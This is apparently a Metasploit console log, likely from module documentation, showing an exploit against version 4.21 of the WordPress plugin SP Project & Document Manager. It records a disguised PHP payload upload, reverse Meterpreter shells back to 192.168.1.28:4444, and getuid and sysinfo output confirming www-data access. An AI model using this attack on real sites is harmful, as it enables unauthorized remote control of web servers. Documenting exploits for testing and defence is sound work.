[*] Started reverse TCP handler on 192.168.1.28:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] Version 4.21 of plugin SP Project & Document Manager found !
[+] The target is vulnerable. This version of SP Project & Document Manager is vulnerable !
[*] Uploading file 'ejtfh.pHP' containing the payload...
[*] Sending stage (39282 bytes) to 192.168.1.35
[*] Meterpreter session 4 opened (192.168.1.28:4444 -> 192.168.1.35:59938) at 2021-07-09 11:41:25 +0200
[*] Triggering the payload ...
[*] Sending stage (39282 bytes) to 192.168.1.35
[*] Meterpreter session 5 opened (192.168.1.28:4444 -> 192.168.1.35:59940) at 2021-07-09 11:41:45 +0200

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo 
Computer    : 217a92584fbf
OS          : Linux 217a92584fbf 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64
Meterpreter : php/linux
meterpreter > 
```
